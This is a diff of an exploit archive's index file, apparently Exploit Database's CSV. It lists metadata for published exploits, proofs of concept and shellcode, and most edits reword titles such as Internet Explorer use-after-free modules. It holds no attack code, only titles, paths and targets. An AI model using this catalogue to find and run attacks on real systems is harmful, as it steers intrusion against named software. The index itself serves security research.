 18639,platforms/php/webapps/18639.txt,"phpList 2.10.17 Remote SQL Injection and XSS Vulnerability",2012-03-21,LiquidWorm,php,webapps,0
 18640,platforms/windows/remote/18640.txt,"Google Talk gtalk:// Deprecated Uri Handler Parameter Injection Vulnerability",2012-03-22,rgod,windows,remote,0
 18641,platforms/windows/dos/18641.txt,"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT ActiveX Control PlayerPT.ocx sprintf Buffer Overflow Vulnerability",2012-03-22,rgod,windows,dos,0
-18642,platforms/windows/remote/18642.rb,"MS10-002 Internet Explorer Object Memory Use-After-Free",2012-03-22,metasploit,windows,remote,0
+18642,platforms/windows/remote/18642.rb,"Internet Explorer - Object Memory Use-After-Free (MS10-002)",2012-03-22,metasploit,windows,remote,0
 18643,platforms/windows/dos/18643.py,"Ricoh DC Software DL-10 FTP Server (SR10.exe) <= 1.1.0.6 - Remote Buffer Overflow Vulnerability",2012-03-22,"Julien Ahrens",windows,dos,0
 18644,platforms/php/webapps/18644.txt,"vBShout Persistent XSS",2012-03-22,ToiL,php,webapps,0
 18646,platforms/hardware/webapps/18646.txt,"Cyberoam UTM Multiiple Vulnerabilities",2012-03-22,"Saurabh Harit",hardware,webapps,0
@ -16189,7 +16188,7 @@ id,file,description,date,author,platform,type,port
 18752,platforms/php/webapps/18752.txt,"newscoop 3.5.3 - Multiple Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0
 18753,platforms/php/webapps/18753.txt,"XOOPS 2.5.4 - Multiple XSS Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0
 18754,platforms/multiple/dos/18754.php,"LibreOffice 3.5.2.2 Memory Corruption",2012-04-19,shinnai,multiple,dos,0
-18755,platforms/windows/dos/18755.c,"MS11-046 Afd.sys Proof of Concept",2012-04-19,fb1h2s,windows,dos,0
+18755,platforms/windows/dos/18755.c,"Windows - Afd.sys Proof of Concept (MS11-046)",2012-04-19,fb1h2s,windows,dos,0
 18756,platforms/multiple/dos/18756.txt,"OpenSSL ASN1 BIO Memory Corruption Vulnerability",2012-04-19,"Tavis Ormandy",multiple,dos,0
 18757,platforms/windows/dos/18757.txt,"VLC 2.0.1 (.mp4) - Crash PoC",2012-04-19,"Senator of Pirates",windows,dos,0
 18758,platforms/multiple/dos/18758.txt,"Wireshark 'call_dissector()' NULL Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0
@ -16211,7 +16210,7 @@ id,file,description,date,author,platform,type,port
 18777,platforms/windows/dos/18777.txt,".NET Framework EncoderParameter Integer Overflow Vulnerability",2012-04-24,"Akita Software Security",windows,dos,0
 18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 (index.php p parameter) SQL Injection",2012-04-24,G13,php,webapps,0
 18779,platforms/hardware/remote/18779.txt,"RuggedCom Devices Backdoor Access",2012-04-24,jc,hardware,remote,0
-18780,platforms/windows/remote/18780.rb,"MS12-027 MSCOMCTL ActiveX Buffer Overflow",2012-04-25,metasploit,windows,remote,0
+18780,platforms/windows/remote/18780.rb,"WIndows - MSCOMCTL ActiveX Buffer Overflow (MS12-027)",2012-04-25,metasploit,windows,remote,0
 18781,platforms/windows/local/18781.rb,"Shadow Stream Recorder 3.0.1.7 - Buffer Overflow",2012-04-25,metasploit,windows,local,0
 18782,platforms/php/webapps/18782.txt,"piwigo 2.3.3 - Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",php,webapps,0
 18783,platforms/linux/local/18783.txt,"mount.cifs chdir() Arbitrary root File Identification",2012-04-25,Sha0,linux,local,0
@ -16411,7 +16410,7 @@ id,file,description,date,author,platform,type,port
 19034,platforms/windows/dos/19034.cpp,"PEamp (.mp3) Memory Corruption PoC",2012-06-10,Ayrbyte,windows,dos,0
 19035,platforms/php/webapps/19035.txt,"freepost 0.1 r1 - Multiple Vulnerabilities",2012-06-10,"ThE g0bL!N",php,webapps,0
 19036,platforms/php/webapps/19036.php,"Wordpress Content Flow 3D Plugin 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0
-19037,platforms/windows/local/19037.rb,"MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability",2012-06-11,metasploit,windows,local,0
+19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling Vulnerability (MS12-005)",2012-06-11,metasploit,windows,local,0
 19038,platforms/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability",2012-06-10,metasploit,php,webapps,0
 19039,platforms/bsd/remote/19039,"BSD 4.2 fingerd buffer overflow Vulnerability",1988-10-01,anonymous,bsd,remote,0
 19040,platforms/solaris/remote/19040,"SunView (SunOS <= 4.1.1) selection_svc Vulnerability",1990-08-14,"Peter Shipley",solaris,remote,0
@ -16504,7 +16503,7 @@ id,file,description,date,author,platform,type,port
 19137,platforms/hardware/dos/19137.rb,"Wyse Machine Remote Power off (DOS) without any privilege",2012-06-14,it.solunium,hardware,dos,0
 19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0
 19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 Memory Corruption Exploit",2012-06-14,"Felipe Andres Manzano",multiple,local,0
-19141,platforms/windows/remote/19141.rb,"MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption",2012-06-14,metasploit,windows,remote,0
+19141,platforms/windows/remote/19141.rb,"Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)",2012-06-14,metasploit,windows,remote,0
 19142,platforms/linux/local/19142.sh,"Oracle 8 File Access Vulnerabilities",1999-05-06,"Kevin Wenchel",linux,local,0
 19143,platforms/windows/local/19143.c,"Microsoft Windows ""April Fools 2001"" Vulnerability",1999-01-07,"Richard M. Smith",windows,local,0
 19144,platforms/windows/local/19144,"Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 Backdoor Vulnerability",1999-01-07,"Satu Laksela",windows,local,0
@ -17099,7 +17098,7 @@ id,file,description,date,author,platform,type,port
 19774,platforms/hardware/webapps/19774.txt,"TP Link Gateway 3.12.4 - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,hardware,webapps,0
 19775,platforms/php/webapps/19775.txt,"Reserve Logic 1.2 - Booking CMS Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,php,webapps,0
 19776,platforms/windows/local/19776.pl,"ZipItFast PRO 3.0 - Heap Overflow Exploit",2012-07-12,b33f,windows,local,0
-19777,platforms/windows/dos/19777.txt,"IE9, SharePoint, Lync toStaticHTML HTML Sanitizing Bypass",2012-07-12,"Adi Cohen",windows,dos,0
+19777,platforms/windows/dos/19777.txt,"IE 9, SharePoint, Lync toStaticHTML HTML Sanitizing Bypass",2012-07-12,"Adi Cohen",windows,dos,0
 19778,platforms/linux/local/19778.c,"RedHat 4.x/5.x/6.x,RedHat man 1.5,Turbolinux man 1.5,Turbolinux 3.5/4.x man Buffer Overrun (1)",2000-02-26,"Babcia Padlina",linux,local,0
 19779,platforms/linux/local/19779.c,"RedHat 4.x/5.x/6.x,RedHat man 1.5,Turbolinux man 1.5,Turbolinux 3.5/4.x man Buffer Overrun (2)",2000-02-26,"Babcia Padlina",linux,local,0
 19780,platforms/multiple/remote/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 DoS Vulnerabilities",2000-02-26,"Jeff Stevens",multiple,remote,0
@ -17834,7 +17833,7 @@ id,file,description,date,author,platform,type,port
 20544,platforms/php/webapps/20544.txt,"xt:Commerce <= 3.04 SP2.1 - Time Based Blind SQL Injection",2012-08-15,stoffline.com,php,webapps,0
 20545,platforms/windows/webapps/20545.txt,"Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities",2012-08-15,loneferret,windows,webapps,0
 20546,platforms/php/webapps/20546.txt,"sphpforum 0.4 - Multiple Vulnerabilities",2012-08-15,loneferret,php,webapps,0
-20547,platforms/windows/remote/20547.txt,"IE Time Element Memory Corruption Exploit (MS11-050)",2012-08-16,Ciph3r,windows,remote,0
+20547,platforms/windows/remote/20547.txt,"Internet Explorer Time Element Memory Corruption Exploit (MS11-050)",2012-08-16,Ciph3r,windows,remote,0
 20549,platforms/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Stored XSS",2012-08-16,"Shai rod",php,webapps,0
 20550,platforms/php/webapps/20550.txt,"ProQuiz 2.0.2 - CSRF Vulnerability",2012-08-16,DaOne,php,webapps,0
 20551,platforms/linux/remote/20551.pl,"E-Mail Security Virtual Appliance (ESVA) Remote Execution",2012-08-16,iJoo,linux,remote,0
@ -19077,11 +19076,11 @@ id,file,description,date,author,platform,type,port
 21837,platforms/windows/remote/21837.rb,"InduSoft Web Studio Arbitrary Upload Remote Code Execution",2012-10-10,metasploit,windows,remote,4322
 21838,platforms/windows/remote/21838.rb,"Avaya WinPMD UniteHostRouter Buffer Overflow",2012-10-10,metasploit,windows,remote,3217
 21839,platforms/windows/remote/21839.rb,"NTR ActiveX Control StopModule() Remote Code Execution",2012-10-10,metasploit,windows,remote,0
-21840,platforms/windows/remote/21840.rb,"MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability",2012-10-10,metasploit,windows,remote,0
+21840,platforms/windows/remote/21840.rb,"Microsoft Internet Explorer - execCommand Use-After-Free Vulnerability (MS12-063)",2012-10-10,metasploit,windows,remote,0
 21841,platforms/windows/remote/21841.rb,"NTR ActiveX Control Check() Method Buffer Overflow",2012-10-10,metasploit,windows,remote,0
 21842,platforms/windows/remote/21842.rb,"HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution",2012-10-10,metasploit,windows,remote,0
 21843,platforms/windows/local/21843.rb,"Windows Escalate UAC Execute RunAs",2012-10-10,metasploit,windows,local,0
-21844,platforms/windows/local/21844.rb,"MS11-080 AfdJoinLeaf Privilege Escalation",2012-10-10,metasploit,windows,local,0
+21844,platforms/windows/local/21844.rb,"Windows - AfdJoinLeaf Privilege Escalation (MS11-080)",2012-10-10,metasploit,windows,local,0
 21845,platforms/windows/local/21845.rb,"Windows Escalate UAC Protection Bypass",2012-10-10,metasploit,windows,local,0
 21846,platforms/java/remote/21846.rb,"Oracle Business Transaction Management FlashTunnelService Remote Code Execution",2012-10-10,metasploit,java,remote,7001
 21847,platforms/windows/remote/21847.rb,"Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution",2012-10-10,metasploit,windows,remote,0
@ -21631,7 +21630,7 @@ id,file,description,date,author,platform,type,port
 24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x and 5.0.x Persistent XSS Vulnerability",2013-02-11,"Mohamed Ramadan",php,webapps,0
 24483,platforms/hardware/webapps/24483.txt,"TP-LINK Admin Panel Multiple CSRF Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0
 24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0
-24485,platforms/windows/dos/24485.txt,"MS13-005 HWND_BROADCAST PoC",2013-02-11,0vercl0k,windows,dos,0
+24485,platforms/windows/dos/24485.txt,"Windows - HWND_BROADCAST PoC (MS13-005)",2013-02-11,0vercl0k,windows,dos,0
 24486,platforms/multiple/dos/24486.txt,"Google Chrome Silent HTTP Authentication",2013-02-11,T355,multiple,dos,0
 24487,platforms/linux/dos/24487.py,"cURL Buffer Overflow Vulnerability",2013-02-11,Volema,linux,dos,0
 24490,platforms/windows/remote/24490.rb,"Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution",2013-02-12,metasploit,windows,remote,0
@ -21673,7 +21672,7 @@ id,file,description,date,author,platform,type,port
 24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0
 24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple XSS Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0
 24537,platforms/php/webapps/24537.txt,"phpMyRecipes 1.2.2 (viewrecipe.php, r_id param) - SQL Injection Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0
-24538,platforms/windows/remote/24538.rb,"MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free",2013-02-23,metasploit,windows,remote,0
+24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)",2013-02-23,metasploit,windows,remote,0
 24539,platforms/multiple/remote/24539.rb,"Java Applet JMX Remote Code Execution",2013-02-25,metasploit,multiple,remote,0
 24540,platforms/php/webapps/24540.pl,"Brewthology 0.1 - SQL Injection Exploit",2013-02-26,"cr4wl3r ",php,webapps,0
 24542,platforms/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection Vulnerability",2013-02-26,L0n3ly-H34rT,php,webapps,0
@ -23256,7 +23255,7 @@ id,file,description,date,author,platform,type,port
 26172,platforms/php/webapps/26172.txt,"Mantis 0.x/1.0 - Multiple Input Validation Vulnerabilities",2005-08-19,anonymous,php,webapps,0
 26173,platforms/windows/dos/26173.txt,"AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method",2013-06-13,"Javier Repiso Sánchez",windows,dos,0
 26174,platforms/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez, Lopez, Castillo",hardware,webapps,0
-26175,platforms/windows/remote/26175.rb,"MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow",2013-06-13,metasploit,windows,remote,0
+26175,platforms/windows/remote/26175.rb,"Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009)",2013-06-13,metasploit,windows,remote,0
 26176,platforms/php/webapps/26176.txt,"Woltlab Burning Board 2.x ModCP.PHP SQL Injection Vulnerability",2005-08-20,[R],php,webapps,0
 26177,platforms/php/webapps/26177.txt,"Land Down Under 800/801 links.php w Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0
 26178,platforms/php/webapps/26178.txt,"Land Down Under 800/801 journal.php m Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0
@ -25103,7 +25102,7 @@ id,file,description,date,author,platform,type,port
 28079,platforms/windows/dos/28079.py,"jetAudio 8.0.16.2000 Plus VX - (.wav) - Crash PoC",2013-09-04,ariarat,windows,dos,0
 28080,platforms/windows/dos/28080.py,"GOMPlayer 2.2.53.5169 (.wav) - Crash PoC",2013-09-04,ariarat,windows,dos,0
 28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 and OS X 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0
-28082,platforms/windows/remote/28082.rb,"MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free",2013-09-04,metasploit,windows,remote,0
+28082,platforms/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059)",2013-09-04,metasploit,windows,remote,0
 28083,platforms/windows/remote/28083.rb,"HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution",2013-09-04,metasploit,windows,remote,0
 28084,platforms/windows/local/28084.html,"KingView 6.53 - Insecure ActiveX Control (SuperGrid)",2013-09-04,blake,windows,local,0
 28085,platforms/windows/local/28085.html,"KingView 6.53 - ActiveX Remote File Creation / Overwrite (KChartXY)",2013-09-04,blake,windows,local,0
@ -25205,7 +25204,7 @@ id,file,description,date,author,platform,type,port
 28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0
 28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 (search.php, cat_id param) - SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0
 28186,platforms/windows/remote/28186.c,"Kaillera 0.86 Message Buffer Overflow Vulnerability",2006-07-06,"Luigi Auriemma",windows,remote,0
-28187,platforms/windows/remote/28187.rb,"MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free",2013-09-10,metasploit,windows,remote,0
+28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer CAnchorElement Use-After-Free (MS13-055)",2013-09-10,metasploit,windows,remote,0
 28188,platforms/windows/remote/28188.rb,"HP SiteScope Remote Code Execution",2013-09-10,metasploit,windows,remote,8080
 28189,platforms/windows/remote/28189.txt,"Microsoft Excel 2000-2004 Style Handling and Repair Remote Code Execution Vulnerability",2006-07-06,Nanika,windows,remote,0
 28190,platforms/php/webapps/28190.txt,"ExtCalendar 2.0 ExtCalendar.php Remote File Include Vulnerability",2006-07-07,Matdhule,php,webapps,0
@ -25256,7 +25255,7 @@ id,file,description,date,author,platform,type,port
 28235,platforms/windows/remote/28235.c,"RARLAB WinRAR 3.x LHA Filename Handling Buffer Overflow Vulnerability",2006-07-18,"Ryan Smith",windows,remote,0
 28236,platforms/ios/webapps/28236.txt,"Talkie Bluetooth Video iFiles 2.0 iOS - Multiple Vulnerabilities",2013-09-12,Vulnerability-Lab,ios,webapps,0
 28237,platforms/windows/dos/28237.py,"Target Longlife Media Player 2.0.2.0 (.wav) - Crash PoC",2013-09-12,gunslinger_,windows,dos,0
-28238,platforms/windows/webapps/28238.txt,"Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling Vulnerability MS13-067",2013-09-12,Vulnerability-Lab,windows,webapps,0
+28238,platforms/windows/webapps/28238.txt,"Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling Vulnerability (MS13-067)",2013-09-12,Vulnerability-Lab,windows,webapps,0
 28239,platforms/hardware/webapps/28239.txt,"D-Link DSL-2740B - Multiple CSRF Vulnerabilities",2013-09-12,"Ivano Binetti",hardware,webapps,0
 28243,platforms/linux/webapps/28243.txt,"Synology DiskStation Manager (DSM) 4.3-3776 - Multiple Vulnerabilities",2013-09-12,"Andrea Fabrizi",linux,webapps,0
 28244,platforms/windows/dos/28244.txt,"Microsoft Internet Explorer 6.0 DataSourceControl Denial of Service Vulnerability",2006-07-19,hdm,windows,dos,0
@ -25486,8 +25485,8 @@ id,file,description,date,author,platform,type,port
 28473,platforms/php/webapps/28473.txt,"Autentificator 2.01 Aut_Verifica.Inc.PHP SQL Injection Vulnerability",2006-09-02,SirDarckCat,php,webapps,0
 28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 Multi-Egghunter",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0
 28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow",2013-09-23,metasploit,windows,remote,6502
-28481,platforms/windows/remote/28481.rb,"MS13-069 Microsoft Internet Explorer CCaret Use-After-Free",2013-09-23,metasploit,windows,remote,0
+28481,platforms/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069)",2013-09-23,metasploit,windows,remote,0
-28482,platforms/windows/remote/28482.rb,"MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution",2013-09-23,metasploit,windows,remote,0
+28482,platforms/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071)",2013-09-23,metasploit,windows,remote,0
 28483,platforms/php/remote/28483.rb,"GLPI install.php Remote Command Execution",2013-09-23,metasploit,php,remote,80
 28484,platforms/hardware/remote/28484.rb,"Linksys WRT110 Remote Command Execution",2013-09-23,metasploit,hardware,remote,0
 28485,platforms/php/webapps/28485.txt,"Wordpress NOSpamPTI Plugin - Blind SQL Injection",2013-09-23,"Alexandro Silva",php,webapps,0
@ -25964,7 +25963,7 @@ id,file,description,date,author,platform,type,port
 28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 (exportcsv.php, sondage param) - SQL Injection",2013-10-15,drone,php,webapps,80
 28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection and Remote Code Execution",2013-10-15,"Jason Kratzer",unix,webapps,0
 28973,platforms/windows/remote/28973.rb,"HP Data Protector Cell Request Service Buffer Overflow",2013-10-15,metasploit,windows,remote,0
-28974,platforms/windows/remote/28974.rb,"MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free",2013-10-15,metasploit,windows,remote,0
+28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080)",2013-10-15,metasploit,windows,remote,0
 28975,platforms/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0
 28976,platforms/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - File Include Vulnerability",2013-10-15,Vulnerability-Lab,ios,webapps,0
 28977,platforms/ios/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0
@ -26783,8 +26782,8 @@ id,file,description,date,author,platform,type,port
 29853,platforms/windows/remote/29853.rb,"LanDesk Management Suite 8.7 Alert Service AOLSRVR.EXE Buffer Overflow Vulnerability",2007-04-13,"Aaron Portnoy",windows,remote,0
 29854,platforms/php/webapps/29854.txt,"BloofoxCMS 0.2.2 Img_Popup.PHP Cross-Site Scripting Vulnerability",2007-04-14,the_Edit0r,php,webapps,0
 29855,platforms/php/webapps/29855.txt,"Flowers Cas.PHP Cross-Site Scripting Vulnerability",2007-04-14,the_Edit0r,php,webapps,0
-29857,platforms/windows/remote/29857.rb,"MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow",2013-11-27,metasploit,windows,remote,0
+29857,platforms/windows/remote/29857.rb,"Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090)",2013-11-27,metasploit,windows,remote,0
-29858,platforms/windows/remote/29858.rb,"MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access",2013-11-27,metasploit,windows,remote,0
+29858,platforms/windows/remote/29858.rb,"Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022)",2013-11-27,metasploit,windows,remote,0
 29859,platforms/java/remote/29859.rb,"Apache Roller OGNL Injection",2013-11-27,metasploit,java,remote,8080
 29860,platforms/windows/dos/29860.c,"ZoneAlarm 6.1.744.001/6.5.737.000 Vsdatant.SYS Driver Local Denial of Service Vulnerability",2007-04-15,"Matousec Transparent security",windows,dos,0
 29861,platforms/php/webapps/29861.txt,"Palo Alto Networks Pan-OS 5.0.8 - Multiple Vulnerabilities",2013-11-27,"Thomas Pollet",php,webapps,0
@ -29181,7 +29180,7 @@ id,file,description,date,author,platform,type,port
 32434,platforms/php/webapps/32434.txt,"Recipe Script 'search.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
 32435,platforms/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow Vulnerabil?ity (PoC)",2014-03-22,"Veysel HATAS",windows,dos,0
 32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0
-32438,platforms/windows/remote/32438.rb,"MS14-012 Internet Explorer TextRange Use-After-Free",2014-03-22,metasploit,windows,remote,0
+32438,platforms/windows/remote/32438.rb,"Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,metasploit,windows,remote,0
 32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,metasploit,php,remote,80
 32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG Private Key Privelege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
 32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass Vulnerability",2008-09-29,Crackers_Child,php,webapps,0
@ -29523,7 +29522,7 @@ id,file,description,date,author,platform,type,port
 32790,platforms/php/webapps/32790.txt,"XCloner Standalone 3.5 - CSRF Vulnerability",2014-04-10,"High-Tech Bridge SA",php,webapps,80
 32791,platforms/multiple/remote/32791.c,"Heartbleed OpenSSL - Information Leak Exploit (1)",2014-04-10,prdelka,multiple,remote,443
 32792,platforms/php/webapps/32792.txt,"Orbit Open Ad Server 1.1.0 - SQL Injection",2014-04-10,"High-Tech Bridge SA",php,webapps,80
-32793,platforms/windows/local/32793.rb,"MS14-017 Microsoft Word RTF Object Confusion",2014-04-10,metasploit,windows,local,0
+32793,platforms/windows/local/32793.rb,"Microsoft Word - RTF Object Confusion (MS14-017)",2014-04-10,metasploit,windows,local,0
 32794,platforms/php/remote/32794.rb,"Vtiger Install Unauthenticated Remote Command Execution",2014-04-10,metasploit,php,remote,80
 32795,platforms/novell/remote/32795.txt,"Novell QuickFinder Server Multiple Cross-Site Scripting Vulnerabilities",2009-02-09,"Ivan Sanchez",novell,remote,0
 32796,platforms/linux/remote/32796.txt,"Swann DVR4 SecuraNet Directory Traversal Vulnerability",2009-02-10,"Terry Froy",linux,remote,0
@ -29579,7 +29578,7 @@ id,file,description,date,author,platform,type,port
 32848,platforms/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 Local Privilege Escalation Vulnerability",2009-03-10,"Sun Microsystems",linux,local,0
 32849,platforms/linux/dos/32849.txt,"PostgreSQL <= 8.3.6 Conversion Encoding Remote Denial of Service Vulnerability",2009-03-11,"Afonin Denis",linux,dos,0
 32850,platforms/windows/local/32850.txt,"Multiple SlySoft Products - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local,0
-32851,platforms/windows/remote/32851.html,"MS14-012 Internet Explorer CMarkup Use-After-Free",2014-04-14,"Jean-Jamil Khalife",windows,remote,0
+32851,platforms/windows/remote/32851.html,"Internet Explorer - CMarkup Use-After-Free (MS14-012)",2014-04-14,"Jean-Jamil Khalife",windows,remote,0
 32852,platforms/php/webapps/32852.txt,"TikiWiki 2.2/3.0 'tiki-galleries.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
 32853,platforms/php/webapps/32853.txt,"TikiWiki 2.2/3.0 'tiki-list_file_gallery.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
 32854,platforms/php/webapps/32854.txt,"TikiWiki 2.2/3.0 'tiki-listpages.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
@ -29630,7 +29629,7 @@ id,file,description,date,author,platform,type,port
 32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL 'safe_mode' and 'open_basedir' Restriction-Bypass Vulnerability",2009-04-10,"Maksymilian Arciemowicz",php,local,0
 32902,platforms/windows/dos/32902.py,"Microsoft Internet Explorer 8 File Download Denial of Service Vulnerability",2009-04-11,"Nam Nguyen",windows,dos,0
 32903,platforms/asp/webapps/32903.txt,"People-Trak Login SQL Injection Vulnerability",2009-04-13,Mormoroth.net,asp,webapps,0
-32904,platforms/windows/remote/32904.rb,"MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free",2014-04-16,metasploit,windows,remote,0
+32904,platforms/windows/remote/32904.rb,"Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012)",2014-04-16,metasploit,windows,remote,0
 32905,platforms/php/webapps/32905.txt,"LinPHA 1.3.2/1.3.3 login.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
 32906,platforms/php/webapps/32906.txt,"LinPHA 1.3.2/1.3.3 new_images.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
 32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension 'apps/web/vs_diag.cgi' Cross Site Scripting Vulnerability",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0
@ -30499,7 +30498,7 @@ id,file,description,date,author,platform,type,port
 33856,platforms/php/webapps/33856.txt,"Viennabux Beta! 'cat' Parameter SQL Injection Vulnerability",2010-04-09,"Easy Laster",php,webapps,0
 33857,platforms/php/webapps/33857.txt,"e107 0.7.x 'e107_admin/banner.php' SQL Injection Vulnerability",2010-04-21,"High-Tech Bridge SA",php,webapps,0
 33858,platforms/php/webapps/33858.txt,"DBSite wb CMS 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0
-33860,platforms/windows/dos/33860.html,"Internet Explorer 8, 9 & 10 - CInput Use-After-Free (MS14-035) - Crash PoC",2014-06-24,"Drozdova Liudmila",windows,dos,0
+33860,platforms/windows/dos/33860.html,"Internet Explorer 8, 9 & 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0
 33862,platforms/hardware/remote/33862.rb,"D-Link authentication.cgi Buffer Overflow",2014-06-24,metasploit,hardware,remote,80
 33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,metasploit,hardware,remote,80
 33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,metasploit,linux,remote,40007
@ -30528,8 +30527,8 @@ id,file,description,date,author,platform,type,port
 33889,platforms/php/webapps/33889.txt,"SmartBlog 1.3 SQL Injection and Cross Site Scripting Vulnerabilities",2010-04-27,indoushka,php,webapps,0
 33890,platforms/windows/remote/33890.txt,"OneHTTPD 0.6 Directory Traversal Vulnerability",2010-04-27,"John Leitch",windows,remote,0
 33891,platforms/java/remote/33891.rb,"HP AutoPass License Server File Upload",2014-06-27,metasploit,java,remote,5814
-33892,platforms/windows/local/33892.rb,"MS14-009 .NET Deployment Service IE Sandbox Escape",2014-06-27,metasploit,windows,local,0
